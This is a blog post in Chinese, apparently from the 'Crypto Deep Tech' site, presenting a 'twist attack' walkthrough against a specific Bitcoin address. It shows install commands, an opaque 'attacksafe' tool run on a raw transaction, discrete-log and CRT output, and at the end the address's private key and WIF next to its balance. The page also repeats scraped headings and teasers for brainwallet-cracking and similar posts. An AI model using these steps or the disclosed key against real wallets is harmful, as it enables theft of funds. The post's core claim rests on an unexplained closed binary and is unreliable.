Twist Attack 示例 #2 繼續執行一系列 ECC 操作以獲取比特幣錢包私鑰的值

Crypto Deep Tech

在本文中，我們將使用示例#2 實現扭曲攻擊，根據文章的第一理論部分，我們確保借助 secp256k1 橢圓曲線上的某些點，我們可以獲得部分值私鑰並在 5-15 分鐘內使用“Sagemath pollard rho 函數：(discrete_log_rho)”和“中國剩餘定理”恢復比特幣錢包。

讓我們繼續進行一系列 ECC 操作，因為這些特定點是 secp256k1 橢圓曲線上的惡意選擇點

Twist Attack 示例 #2 繼續執行一系列 ECC 操作以獲取比特幣錢包私鑰的值 — https://github.com/christianlundkvist/blog/blob/master/2020_05_26_secp256k1_twist_attacks/secp256k1_twist_attacks.md

根據 Paulo Barreto 的推文：https://twitter.com/pbarreto/status/825703772382908416 ?s=21

餘因子為3^213^23319*22639

E1: 20412485227
E2: 3319, 22639
E3: 109903, 12977017, 383229727
E4: 18979
E6: 10903, 5290657, 10833080827, 22921299619447

prod = 20412485227 * 3319 * 22639 *109903 * 12977017 * 383229727 * 18979 * 10903 * 5290657 * 10833080827 * 22921299619447

38597363079105398474523661669562635951234135017402074565436668291433169282997 = 3 * 13^2 * 3319 * 22639 * 1013176677300131846900870239606035638738100997248092069256697437031

HEX:0x55555555555555555555555555555555C1C5B65DC59275416AB9E07B0FEDE7B5

在運行Twist Attack時，可以通過對“公鑰”（secp256k1 橢圓曲線的選定點）進行一定的選擇來獲得“私鑰”，即揭示交易中的價值。之後，關於私鑰的信息也會被洩露，但是為此你需要執行幾個 ECC 操作。

E1: y^2 = x^3 + 1
E2: y^2 = x^3 + 2
E3: y^2 = x^3 + 3
E4: y^2 = x^3 + 4
E6: y^2 = x^3 + 6

y² = x³ + ax + b. In the Koblitz curve,
y² = x³ + 0x + 7. In the Koblitz curve,
0  = x³ + 0  + 7
b '= -x ^ 3 - ax.

所有點都(x, 0) 落在無效曲線上 b '= -x ^ 3 - ax

讓我們繼續進行實驗部分：

（考慮一個比特幣地址）

1L7vTvRwmWENJm4g15rAxAtGcXjrFsWcBx

（現在考慮關鍵易受攻擊的交易）

https://btc1.trezor.io/tx/60918fd82894eb94c71a9c10057ffe9d8a82074426f596dcbc759d676c886ae9

打開 [TerminalGoogleColab]。

使用我們的18TwistAttack存儲庫實施Twist Attack算法

git clone https://github.com/demining/CryptoDeepTools.git

cd CryptoDeepTools/18TwistAttack/

ls

安裝我們需要的所有包

requirements.txt

sudo apt install python2-minimal

wget https://bootstrap.pypa.io/pip/2.7/get-pip.py

sudo python2 get-pip.py

pip2 install -r requirements.txt

為攻擊準備 RawTX

1L7vTvRwmWENJm4g15rAxAtGcXjrFsWcBx

https://btc1.trezor.io/tx/60918fd82894eb94c71a9c10057ffe9d8a82074426f596dcbc759d676c886ae9

RawTX = 01000000013edba424d1b614ec2182c8ac6856215afb803bcb9748c1888eecd35fffad67730e0000006b483045022100bbabd1cb2097e0053b3da453b15fd195a2bc1e8dbe00cfd60aee95b404d2abfa02201af66956a7ea158d32b0a56a46a83fe27f9e544387c8d0ce13cd2a54dba9a747012102912cd095d2c20e4fbdb20a8710971dd040a067dba45899b7156e9347efc20312ffffffff01a8020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000

保存在文件中：RawTX.txt

為了實施攻擊，我們將使用“ATTACKSAFE SOFTWARE”軟件

訪問權限：

chmod +x attacksafe

應用：

./attacksafe -help

  -version:  software version 
  -list:     list of bitcoin attacks
  -tool:     indicate the attack
  -gpu:      enable gpu
  -time:     work timeout
  -server:   server mode
  -port:     server port
  -open:     open file
  -save:     save file
  -search:   vulnerability search
  -stop:     stop at mode
  -max:      maximum quantity in mode
  -min:      minimum quantity per mode
  -speed:    boost speed for mode
  -range:    specific range
  -crack:    crack mode
  -field:    starting field
  -point:    starting point
  -inject:   injection regimen
  -decode:   decoding mode

./attacksafe -version

"ATTACKSAFE SOFTWARE" 包括對比特幣的所有流行攻擊。

讓我們列出所有攻擊：

./attacksafe -list

讓我們選擇 -tool: twist_attack

為了從易受攻擊的 ECDSA 簽名交易中獲取特定的 secp256k1 點，我們將數據添加 RawTX 到文本文檔中並將其保存為文件 RawTX.txt

01000000013edba424d1b614ec2182c8ac6856215afb803bcb9748c1888eecd35fffad67730e0000006b483045022100bbabd1cb2097e0053b3da453b15fd195a2bc1e8dbe00cfd60aee95b404d2abfa02201af66956a7ea158d32b0a56a46a83fe27f9e544387c8d0ce13cd2a54dba9a747012102912cd095d2c20e4fbdb20a8710971dd040a067dba45899b7156e9347efc20312ffffffff01a8020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000

`-tool twist_attack` 使用軟件啟動 `“ATTACKSAFE SOFTWARE”`

./attacksafe -tool twist_attack -open RawTX.txt -save SecretPoints.txt

我們發起了這次攻擊 -tool twist_attack 並將結果保存到一個文件中 SecretPoints.txt

現在看到成功的結果，打開文件 SecretPoints.txt

cat SecretPoints.txt

結果：

Elliptic Curve Secret Points:

Q11 = E1([97072073026593516785986136148833105674452542501015145216961054272876839453879, 107567253371779495307521678088935176637661904239924771700494716430774957820966])
Q21 = E2([3350296768277877304391506547616361976369787138559008027651808311357100316617, 72988900267653266243491077449097157591503403928437340215197819240911749073070])
Q22 = E2([112520741232779465095566100761481226712887911875949213866586208031790667764851, 67821409607391406974451792678186486803604797717916857589728259410989018828088])
Q31 = E3([19221018445349571002768878066568778104356611670224206148889744255553888839368, 51911948202474460182474729837629287426170495064721963100930541018009108314113])
Q32 = E3([41890177480111283990531243647299980511217563319657594412233172058507418746086, 50666391602993122126388747247624601309616370399604218474818855509093287774278])
Q33 = E3([42268931450354181048145324837791859216268206183479474730830244807012122440868, 106203099208900270966718494579849900683595613889332211248945862977592813439569])
Q41 = E4([54499795016623216633513895020095562919782606390420118477101689814601700532150, 105485166437855743326869509276555834707863666622073705127774354124823038313021])
Q61 = E6([62124953527279820718051689027867102514830975577976669973362563656149003510557, 100989088237897158673340534473118617341737987866593944452056172771683426720481])
Q62 = E6([86907281605062616221251901813989896824116536666883529138776205878798949076805, 19984923138198085750026187300638434023309806045826685297245727280111269894421])
Q63 = E6([66063410534588649374156935204077330523666149907425414249132071271750455781006, 25315648259518110320341360730017389015499807179224601293064633820188666088920])
Q64 = E6([109180854384525934106792159822888807664445139819154775748567618515646342974321, 102666617356998521143219293179463920284010473849613907153669896702897252016986])


RawTX = 01000000013edba424d1b614ec2182c8ac6856215afb803bcb9748c1888eecd35fffad67730e0000006b483045022100bbabd1cb2097e0053b3da453b15fd195a2bc1e8dbe00cfd60aee95b404d2abfa02201af66956a7ea158d32b0a56a46a83fe27f9e544387c8d0ce13cd2a54dba9a747012102912cd095d2c20e4fbdb20a8710971dd040a067dba45899b7156e9347efc20312ffffffff01a8020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000

現在讓我們添加收到的 secp256k1 點

為此，打開Python-script: discrete.py

運行Python-script: discrete.py安裝SageMath

安裝命令：

sudo apt-get update
sudo apt-get install -y python3-gmpy2
yes '' | sudo env DEBIAN_FRONTEND=noninteractive apt-get -y -o DPkg::options::="--force-confdef" -o DPkg::options::="--force-confold" install sagemath

通過命令檢查SageMath的安裝：sage -v

要求解離散對數，(Pollard's rho algorithm for logarithms)請運行Python-script: discrete.py

運行命令：

sage -python3 discrete.py

結果：

Discrete_log_rho:

14996641256
1546
19575
31735
9071789
145517682
11552
7151
3370711
10797447604
10120546250224

PRIVATE KEY:

3160389728152122137789469305939632411648887242506549174582525524562820572318

privkey = crt([x11, x21, x22, x31, x32, x33, x41, x61, x62, x63, x64], [ord11, ord21, ord22, ord31, ord32, ord33, ord41, ord61, ord62, ord63, ord64])

我們解決了離散對數並使用“中國剩餘定理 (Chinese remainder theorem)”得到了十進制格式的私鑰。

將私鑰轉換為 HEX 格式

私鑰的十進制格式已保存到文件中： privkey.txt

運行 Python 腳本：privkey2hex.py

python3 privkey2hex.py
cat privkey2hex.txt

讓我們打開生成的文件： privkey2hex.txt

十六進制格式的私鑰：

PrivKey = 06fcb79a2eabffa519509e43b7de95bc2df15ca48fe6be29f9160bcd6ac1a49e

讓我們打開 bitaddress 並檢查：

ADDR: 1L7vTvRwmWENJm4g15rAxAtGcXjrFsWcBx
WIF:  KwTHx3AhV8qiN6qyfG1D85TGEeUBiaMUjnQ11eVLP5NAfiVNLLmS
HEX:  06FCB79A2EABFFA519509E43B7DE95BC2DF15CA48FE6BE29F9160BCD6AC1A49E

https://live.blockcypher.com/widget/btc/1L7vTvRwmWENJm4g15rAxAtGcXjrFsWcBx/received/

https://live.blockcypher.com/btc/address/1L7vTvRwmWENJm4g15rAxAtGcXjrFsWcBx/

BALANCE: $ 902.52

來源

攻擊安全軟件

電報：https://t.me/cryptodeeptech

視頻素材：https://youtu.be/pOviZOYItv4

來源：https://cryptodeep.ru/twist-attack-2

密碼分析

Crypto Deep Tech

https://www.youtube.com/embed/xBgjWE5tA7Y 我們都知道，ECDSA 簽名中的秘鑰洩露可以導致比特幣錢包的完全恢復。在我們之前的文章中，我們研究了區塊鏈交易中的弱點和漏洞，但也有 ECDSA 短簽名也導致比特幣錢包的完全恢復。為什麼這些 ECDSA 簽名被稱為短簽名？你可以從討論的話題中得到這個問題的答案：“最短的ECDSA簽名”【The shortest ECDSA signature】在我們的上一篇文章：“使用 ECPy + Google Colab 庫通過標量乘法減少私鑰”中，我們創建了一個Python腳本：maxwell.py，它為我們生成了一個相當有趣的公鑰 (0x3b78ce563f89a0ed9414f5aa28ad0d96d6795f9c63 , 0xc0c686408d517dfd67c2367651380d00d126e4229631fd03f8ff35eef1a61e3c) 我們知道簽名的值，"R"這是從私鑰到公鑰(Nonce) 看看區塊鏈交易：11e6b169701a9047f3ddbb9bc4d4ab1a148c430ba4a5929764e97e76031f4ee3 原始TX： 0100000001afddd5c9f05bd937b24a761606581c0cddd6696e05a25871279f75b7f6cf891f250000005f3c303902153b78ce563f89a0ed9414f5aa28ad0d96d6795f9c6302200a963d693c008f0f8016cfc7861c7f5d8c4e11e11725f8be747bb77d8755f1b8012103151033d660dc0ef657f379065cab49932ce4fb626d92e50d4194e026328af853ffffffff010000000000000000016a00000000 本次交易的規模僅為：156 байт 如何通過 ECDSA 短簽名恢復比特幣錢包？在比特幣區塊鏈的密碼分析中，我們使用自己的Bas h腳本：btcrecover.sh 比特幣錢包恢復過程 Bash 腳本：btcrecover.sh sudo apt install python2-minimal wget https://bootstrap.pypa.io/pip/2.7/get-pip.py sudo python2 get-pip.py pip2 install -r requirements.txt chmod +x btcrecover.sh ./btcrecover.sh 12yysAMhagEm67QCX85p3WQnTUrqcvYVuk ./btcrecover.sh 15HvLBX9auG2bJdLCTxSvjvWvdgsW7BvAT 結果： | privkey…

Crypto Deep Tech

來自比特幣錢包的 Tesla BrainWallet 陷阱提防網絡釣魚和流行的密碼短語

https://www.youtube.com/embed/r0fTtBDWTnw 創建比特幣錢包有多種形式。創建比特幣錢包的第一種方法被稱為 BrainWallet。BrainWallet 方便是因為它允許您將 “密碼”存儲在內存中或筆記本中。密碼短語使用算法進行散列處理 SHA-256，並用作生成私鑰的種子。由於它們的流行和易用性， BrainWallet 過去幾年中許多都使用了弱密碼。這種弱私鑰生成方法允許攻擊者通過簡單地根據存儲在區塊鏈上的哈希值破解密碼來竊取大量硬幣 BTC。儘管此攻擊已為人所知多年，但由於Ryan Castellucciв 2015 году 所做的工作而廣為人知 2015 年 8 月 7 日 Ryan Castellucci 在 DEFCON23上談到破解 BrainWallet密碼。儘管 BrainWallet 此時密碼短語已使用多年，但對話有助於將這些問題帶給更廣泛的公眾。 https://www.youtube.com/embed/foil0hzl4Pg 文件 [ PDF]：破解加密貨幣腦錢包 Ryan Castellucci BrainWallet Ryan結合名為 BrainFlayer Proven Cryptocurrency Wallet Cracker 的工具BrainWallet和其他低熵算法發布了他在黑客方面的工作成果。 GPU 加速目前， пробный cracker Ryan 的 brainflayer 已升級為各種軟件、實用程序、腳本等，但仍創建了圖形加速器以支持GPUBrainWallet 運行時。這些加速器被稱為 TeslaBrainWallet，以NVIDIA® Tesla® V100計算系統系列命名。網絡釣魚許多比特幣擁護者經常引用 BrainWallet 作為保護資金免遭沒收的好方法，但不幸的是 Bitcoin клиента Electrum，. 雖然 Electrum 它支持所有流行的硬件錢包（例如 Trezor， Ledger 等）最多可以安裝第三方插件來擴展錢包的功能，但是如果你安裝舊版本的比特幣錢包，你可能會冒著失去所有的風險錢包中的加密貨幣硬幣。這個陷阱是通俗的下詞 "фишинг"。加密社區有很多悲傷的故事。金額最大的網絡釣魚損失之一 1400 BTC (16 миллионов долларов США) 根據加密行業門戶網站 “CryptoPotato” 最大的網絡釣魚損失 1,400 BTC（1,600 萬美元）一位匿名的比特幣投資者 «1400BitcoinStolen» 周日聲稱，他 1400 BTC 在“愚蠢地”安裝了流行錢包的舊版本後輸了錢Electrum，但後來發現這是一個網絡釣魚騙局。陷阱：在解釋這起不愉快的事件時，受害人說他無法使用這些資金 с 2017 года。在設置錢包並嘗試轉賬後， 1 BTC 他收到一條彈出消息，要求他在轉賬前更新安全系統。不幸的是，這是一個陷阱 - 網絡釣魚企圖。據受害人稱，他安裝了更新後，自己的所有資金都自動轉到了黑客的錢包地址，讓騙子更加富有 на 16 миллионов долларов…

Crypto Deep Tech

隨著區塊鏈的價值變得對各種攻擊具有吸引力，跨鏈橋接

https://www.youtube.com/embed/9rDEepQOyaM 本文將重點關注跨網橋協議中的一個漏洞，該漏洞對不同區塊鏈之間的智能合約是一個很大的安全威脅。跨橋對黑客來說是一個很有吸引力的目標，因為它們通常代表著資金的中央存儲點，這些資金支持接收方區塊鏈上的“橋”資產。什麼是網橋協議？橋接器旨在解決不同區塊鏈之間的互操作性問題。橋是一種允許用戶將數字資產從一個區塊鏈轉移到另一個區塊鏈的協議。最著名的例子之一是橋接協議，它允許用戶在不同的智能合約區塊鏈（如 Solana 和以太坊）之間Wormhole移動加密貨幣。NFT今年2 月2022，有一個案例是一名不知名的黑客在智能合約代碼中發現了一個漏洞，允許他在不提供必要的等價抵押品的情況下Wormhole創建。 120 000 Wrapped EthereumSolana (WeETH)Ethereum Wormhole 區塊鏈橋確認該漏洞竊取了價值 3.2 億美元的加密資產。要了解為什麼此事件比普通黑客攻擊更嚴重，我們需要了解跨橋的工作原理。用戶通過將一種資產中的資金發送到橋協議來與橋進行交互，然後將資金固定在合同中。然後，用戶將獲得協議所連接鏈上平行資產的等價資金。在 Wormhole 的情況下，用戶通常將以太幣發送(ETH)到協議，在那裡它作為抵押品存儲，並發行WeETH到Solana，由合約中鎖定的抵押品支持Wormhole到Ethereum。這次高調的黑客攻擊意味著3.2 億WeETH美元Solana在一定時間內沒有得到保障。如果WeETH以太坊得不到保障，這將意味著許多Solana以接受WeETH為抵押品為基礎的平台可能會資不抵債。我們可以看到用戶急於出售他們的 WeETH，導致其價值下降，對區塊鍊和建立在其上的Solana龐大生態系統產生重大影響，因為其中許多協議也依賴於支持已發行的資產。用戶。事實上，昨晚我們看到了的價格，許多人將其歸因於對黑客攻擊的恐懼。DeFiWeETHSolana13,5% Jump Trading 是 Wormhole 的母公司，也是 Solana 生態系統的主要參與者，他發推文說： Jump TradingETH在嘗試向黑客支付被盜資金獎勵的嘗試被忽略後，提供硬幣來替換被盜資金。橋樑施工橋樑設計各不相同，用戶通常通過將一種資產中的資金發送到橋樑協議來與橋樑進行交互，然後將資金固定在合同中。然後，用戶將獲得與協議連接的鏈上的平行資產的等價資金。在蟲洞的情況下，用戶通常將以太幣發送(ETH)到協議，在那裡它作為抵押品存儲，並釋放ETH蟲洞包裝到Solana，由蟲洞合約中鎖定的抵押品支持到Ethereum。易受攻擊的跨橋橋樑是一個有吸引力的目標，因為它們通常代表支持主機區塊鏈上“橋樑”資產的資金的中央存儲點。無論這些資金是存儲在智能合約中還是中心化託管人中，這個存儲點都會成為目標。此外，高效的橋樑設計仍然是一個未解決的技術問題，許多新模型正在開發和測試中。隨著最佳實踐的不斷改進，這些不同的方案代表了攻擊者可以利用的新攻擊向量。就在幾年前，中心化交易所還是業內最常見的黑客攻擊目標。如今，成功破解集中式交易所的案例很少見。這是因為這些組織優先考慮他們的安全性，也因為黑客總是在尋找最新和最易受攻擊的服務。雖然不可靠，但解決此類問題的有價值的第一步可能是極其嚴格的代碼審計，這將成為DeFi這些構建協議和評估它們的投資者的黃金標準。隨著時間的推移，最可靠和安全的智能合約可以作為開發人員的模板。加密貨幣服務，包括但不限於橋樑，必須投資於安全措施和培訓。結論：目前，所有這些對橋樑的現代攻擊佔了一年69%內被盜的所有資金。2022這對區塊鏈技術構成了嚴重威脅。隨著越來越多的價值通過跨鏈橋，它們對黑客的吸引力就越大。 GitHub 電報：https://t.me/cryptodeeptech 視頻素材：https://youtu.be/9rDEepQOyaM 來源：https://cryptodeep.ru/cross-chain-bridge 密碼分析

«CRYPTO DEEP TECH»

Twist Attack 示例 #2 繼續執行一系列 ECC 操作以獲取比特幣錢包私鑰的值

餘因子為3^213^23319*22639

讓我們繼續進行實驗部分：

安裝我們需要的所有包

為攻擊準備 RawTX

保存在文件中：RawTX.txt

訪問權限：

應用：

讓我們列出所有攻擊：

`-tool twist_attack` 使用軟件啟動 `“ATTACKSAFE SOFTWARE”`

結果：

現在讓我們添加收到的 secp256k1 點

安裝命令：

通過命令檢查SageMath的安裝：sage -v

運行命令：

結果：

將私鑰轉換為 HEX 格式

運行 Python 腳本：privkey2hex.py

Related Posts

Crypto Deep Tech

餘因子為3^2*13^2*3319*22639

讓我們繼續進行實驗部分：

安裝我們需要的所有包

為攻擊準備 RawTX

保存在文件中：RawTX.txt

訪問權限：

應用：

讓我們列出所有攻擊：

-tool twist_attack 使用軟件 啟動 “ATTACKSAFE SOFTWARE”

結果：

現在讓我們添加收到的 secp256k1 點

安裝命令：

通過命令檢查SageMath的安裝：sage -v

運行命令：

結果：

將私鑰轉換為 HEX 格式

運行 Python 腳本：privkey2hex.py

Related Posts

Crypto Deep Tech

餘因子為3^213^23319*22639

`-tool twist_attack` 使用軟件啟動 `“ATTACKSAFE SOFTWARE”`